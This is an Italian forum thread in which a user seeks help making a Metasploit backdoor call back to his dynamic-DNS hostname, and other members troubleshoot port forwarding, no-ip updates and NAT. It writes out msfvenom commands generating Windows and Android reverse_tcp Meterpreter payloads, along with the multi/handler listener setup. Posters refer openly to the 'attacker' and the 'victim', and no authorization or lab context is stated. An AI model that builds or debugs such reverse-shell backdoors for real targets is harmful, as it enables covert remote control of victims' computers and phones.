Discussione Malware backdoor DDNS

[n0tting]

ho un problema con un backdoor esterna su metasploit siccome ho un ip dinamico uso (no-ip). faccio il port forwording su una porta.
dopo scrivo
msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=(hostname) LPORT=(porta forwordata) -o backdoor.exe
una volta creata la passo nel pc fuori dalla mia rete locale
vado su msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_dns
set LHOST 0.0.0.0
set LPORT (porta forwordata)
exploit
apro il file sul altro pc, ma non mi apre nessuna shell meterpreter.

 

[WW313NET]

Che porta hai forwardato?
Molte volte le backdoor non funzionano perché la vittima non ha le giuste porte aperte sul router

 

[n0tting]

4444

 

[WW313NET]

Prova con un altra porta che sia compresa tra 1024 e 65000

 

[JunkCoder]

Usa come payload meterpreter la normale reverse_tcp.
reverse_tcp_dns non si riferisce alla risoluzione di dominio no-ip ma e' proprio il canale di trasmissione ed e' quello che potrebbe crearti problemi nonostante la porta aperta. La porta deve essere forwardata sul router del listener (a cui punta il dominio), non su quello della "vittima".

 

[n0tting]

grazie

Messaggio unito automaticamente: 5 Gennaio 2021

Usa come payload meterpreter la normale reverse_tcp.
reverse_tcp_dns non si riferisce alla risoluzione di dominio no-ip ma e' proprio il canale di trasmissione ed e' quello che potrebbe crearti problemi nonostante la porta aperta. La porta deve essere forwardata sul router del listener (a cui punta il dominio), non su quello della "vittima".

ho provato ma non funziona. come si fa ha capire se la porta è aperta? con nmap ?

 

[n0tting]

ho visto sulla pagina di no ip che l' (ip/target è diverso dall mio ip publico) come mai

 

[JunkCoder]

ho visto sulla pagina di no ip che l' (ip/target è diverso dall mio ip publico) come mai

Devi aggiornarlo, puoi farlo manualmente dall'interfaccia web, tramite API o tramite il software ufficiale scaricabile NO-IP DUC che lo aggiorna ogni tot secondi (necessario per chi ha IP dinamico). Ricorda che se usi un proxy o VPN a livello di sistema, l'IP aggiornato sara' quello della VPN.

 

[n0tting]

ok ho capito grazie quindi ora dovrebbe funzionare

Messaggio unito automaticamente: 7 Gennaio 2021

però se faccio
ping (nome DDNS)
non comunicano

Messaggio unito automaticamente: 7 Gennaio 2021

ho notato che se scrivo nmap (mio ip) mi dice che le porte che ho forwordato sono chiuse

 

[JunkCoder]

ok ho capito grazie quindi ora dovrebbe funzionare

Messaggio unito automaticamente: 7 Gennaio 2021

però se faccio
ping (nome DDNS)
non comunicano

Messaggio unito automaticamente: 7 Gennaio 2021

ho notato che se scrivo nmap (mio ip) mi dice che le porte che ho forwordato sono chiuse

1. Non e' detto che il tuo router risponda al ping, potrebbe ignorarlo
2. Verifica di non essere sotto NAT del tuo provider (e in caso di si, chiedere un IP pubblico personale)
3. Segui una guida completa sul port forwarding

 

[n0tting]

1 )ho disattivato la funzione disabilita ping porta wan
2 )cosa significa Verifica di non essere sotto NAT del tuo provider e come si verifica?
3)per fare il port forwarding sono dovuto andare su server virtuale
ho un router strano di huawei come provider TIM alcune volte se faccio una scansione delle porte mi di ce che la porta è aperta altre volte mi dice che è chiusa.

 

[JunkCoder]

1 )ho disattivato la funzione disabilita ping porta wan
2 )cosa significa Verifica di non essere sotto NAT del tuo provider e come si verifica?
3)per fare il port forwarding sono dovuto andare su server virtuale
ho un router strano di huawei come provider TIM alcune volte se faccio una scansione delle porte mi di ce che la porta è aperta altre volte mi dice che è chiusa.

TIM non mette sotto NAT, quindi non e' quello il problema, verifica che la porta sia aperta per l'IP locale corretto dove hai il software in listening. Se usi DHCP, riavviando il PC o il router il tuo IP locale cambiera' e dovrai aggiornare le impostazioni del port forwarding ogni volta.

 

[n0tting]

io ho assegnato un indirizzo IP statico al mio pc lo stesso che ho messo quando ho settato il port forwording. molto raramente le porte si aprono.

 

[n0tting]

c'é qualcuno che ha avuto il mio stesso problema e ha risolto???

 

[0xbro]

Meglio se studi il funzionamento della rete, delle porte e il port forwarding.
Le porte si aprono da sole SOLO se c'è un servizio in ascolto o che comunque la utilizza. E' il servizio che apre la porta, non è la porta che prima si apre e poi aspetta un servizio.

Anyway, gli step necessari da fare li puoi leggere anche qui, step 1,2 e 3.
- IP statico al PC attaccante
- IP statico alla propria rete/DDNS configurato correttamente sul pannello di controllo
- Port forwarding sul proprio router: redirigi le connessioni in arrivo dalla porta XXXX verso l'IP <attaccante> sulla porta YYYY

 

[n0tting]

ora sto capendo infatti quando mi mettevo in listening la porta si apriva. grazie mille per avermelo fatto notare

Messaggio unito automaticamente: 9 Gennaio 2021

ho provato in locale se faccio ping 192.168.8.x comunicano. ma se installo la backdoor e la eseguo no come mai?? mi ricordo che con il router vecchio non succedeva.

Messaggio unito automaticamente: 9 Gennaio 2021

ora lo ho provato a fare su un cellulare android e ha funzionato (in locale)non capisco perchè da pc no

 

[n0tting]

però in rete estrerna la backdoor non funsiona non so perché.
se faccio ping (DDNS)
non riceve pacchetti
neanche se faccio ping (IP)
non arrivano pacchetti però io ho disattivato il ping porta wan
perche ???

 

[n0tting]

quale puo essere il problema??

 

[0xbro]

Iniziamo a mettere a posto la situazione in locale:
- Metti in chat gli screen degli IP dei due device (attaccante e vittima)
- Metti in chat i comandi usati per generare la backdoor
- Metti in chat i comandi usati per impostare il listener

Quando tutto funziona, proviamo in WAN

 

[n0tting]

IP attaccante(192.168.8.100) IP vittima(192.168.8.x)

_________________________________________________________________________________________________________
per generare la backdoor

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.100 LPORT=4444 -o backdoor.apk

______________________________________________________________________________________________________________
impostare il listener

[CODE]> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

 

[0xbro]

IP attaccante(192.168.8.100) IP vittima(192.168.8.x)

_________________________________________________________________________________________________________
per generare la backdoor

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.100 LPORT=4444 -o backdoor.apk

______________________________________________________________________________________________________________
impostare il listener

[CODE]> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

mmm che cellulare stai utilizzando? i comandi sono giusti, potrebbe essere il device che blocca l'app

 

[n0tting]

è un cellulare con sopra montato android (marshmallow 6.0) comunque in lan funziona in wan no

 

[0xbro]

ah avevo capito male... hai messo le regole di port forwarding?
Quando crei la backdoor LHOST deve essere l'ip pubblico del pc, non quello privato

 

[n0tting]

si lo so devo mettere l IP publico/DDNS.
tu avevi detto prima di provare in locale e in locale funziona.
in wan no.
il port forwording lo ho eseguito. sul mio router si chiama server virtuale.

 

[0xbro]

si lo so devo mettere l IP publico/DDNS.
tu avevi detto prima di provare in locale e in locale funziona.
in wan no.
il port forwording lo ho eseguito. sul mio router si chiama server virtuale.

avevo capito male, che anche in LAN non funzionasse.

Posta lo screen delle regole di forward, è l'unica cosa che manca